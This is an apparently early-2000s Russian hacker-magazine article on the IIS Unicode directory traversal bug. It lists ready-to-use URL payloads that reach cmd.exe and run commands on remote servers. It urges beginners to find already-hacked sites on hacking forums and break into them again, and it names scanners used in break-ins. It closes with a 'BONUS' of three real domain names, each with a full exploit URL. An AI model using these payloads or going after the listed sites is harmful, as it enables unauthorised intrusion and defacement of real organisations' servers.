Знаешь чем сейчас заняты все хакеры и прочие ищущие люди низших чинов? Объясняю: они ищут по поисковым серверам шопы, маркеты, онлайн-магазины и сканят их на предмет unicode bug. Мэн, ты не представляешь себе насколько это модно стало. В основном они тыкают наугад, добавляя к урл'у конструкции типа:

/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\

/scripts/%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\

/_vti_bin/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\

/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\

/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\

/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\

/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\

/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\

/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\

Тебе, читатель, уже давно объяснили, что это за баг и что он позволяет делать на удалённой машине. Этот баг очень полезен
начинающим хакерам. С его помощью они могут изучить структуру и основные принципы Windows NT и IIS. Опыт так сказать. На данный момент среди бывалых взломщиков распространено мнение, что это дурацкий баг и на него не стоит обращать внимания (я согласен). Уж настолько он прост. Информация о баге засветилась в ноябре 2000 года, бродившая до этого в узких кругах, она вырвалась и взломы не заставили себя долго ждать.

Так вот. Ещё одним способом сканирования сайтов на данную уязвимость является уже не метод тыка, а специальные программы для этого написанные. Например: UnicodeCheck.Pl, использовавшийся для взлома сайта Mgimo.ru (припоминаешь? статья на xakep.ru об этом была). Также есть и такого рода программы на Си. Ещё можно ЦГИ-сканнером почекить (www.acidfalz.ru - там сканнер на 862 уязвимости), но это менее удобный и надёжный метод.

Возвращаясь к разговору о "моде" и "тенденциях", хочу предложить незатейливый способ, названный мною (но придуманный давно относительно других багов) способом "падальщика". Способ взлома (а для кого дефейса) сайтов. Разумеется способ не достоин настоящего элитного х... Но для первого раза сойдёт. Поброди по разным сайтам:
www.nitrogear.org
www.secure.f2s.com
www.acidfalz.ru
www.hacking.ru
www.ukrteam.ru

И так делее. Заходи там на разделы hacked или по форумам топай. И там ты увидишь кучу урл'ов хакнутых сайтов.
Учитывая моду на Unicode и не слишком большое желание админов исправить жучки (баги), ты можешь взломать эти сайты по второму разу (падальщик). Методы поиска уязвимости uniode описаны выше. Для начинающих: помни, что тебе нужны лишь IIS4.0, 5.0. Если из предыдущих материалов о unicode, ты так и не понял как ломать, то зайди по ссылкам ниже.

Ссылки по теме (обязательно прочти):


Microsoft IIS Extended UNICODE Directory Traversal Vulnerability
не просто hole, но ASSHOLE 🙂

Суммарная информация по IIS UNICODE

Также заходи на GiN. Ну и заходи на www.xakep.ru, я уверен об этом будут писать не раз.
Единственное, что не очень радует, так это то, что информации об этом баге настолько много в сети, что это может разбудить админов. Так что тссссс...

BONUS:
http://www.fmc.gov/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ (его уже хакали)

http://www.omega.ru/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ (буквально сегодня похукан)

http://www.nsicomm.com/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ (давно хацкали)

-==GREETS to Acid_MArtin and ItsMe==-

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии